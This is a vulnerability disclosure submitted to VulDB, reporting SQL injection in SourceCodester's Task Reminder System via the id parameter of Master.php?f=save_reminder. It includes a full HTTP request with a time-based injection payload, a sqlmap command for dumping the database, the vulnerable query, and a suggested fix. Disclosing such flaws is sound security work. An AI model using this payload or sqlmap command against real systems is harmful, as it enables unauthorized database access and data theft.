Soumettre #228616: SourceCodester Task Management System POST sql injection information

TitreSourceCodester Task Management System POST sql injection
DescriptionI find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) This affect the file /php-trs/classes/Master.php?f=save_reminder: POST /php-trs/classes/Master.php?f=save_reminder HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6 Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)# Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=1", and then you can successfully drag the library The vulnerability in the code "UPDATE `reminder_list` set {data} where id = '{id}'" arises from not implementing proper filtering on the controllable parameter id. This lack of filtering makes the code susceptible to SQL injection attacks. To prevent such attacks, it is recommended to use mysqli_real_escape_string() to protect the id parameter against malicious exploitation. By doing so, the code will be more secure and less prone to SQL injection vulnerabilities.
La source⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
Utilisateur
 fushuling (UID 45488)
Soumission26/10/2023 19:07 (il y a 3 ans)
Modérer26/10/2023 20:21 (1 hour later)
StatutAccepté
Entrée VulDB243645 [SourceCodester Task Reminder System 1.0 Master.php?f=save_reminder ID injection SQL]
Points20

PrécédentAperçuSuivant

Do you need the next level of professionalism?

Upgrade your account now!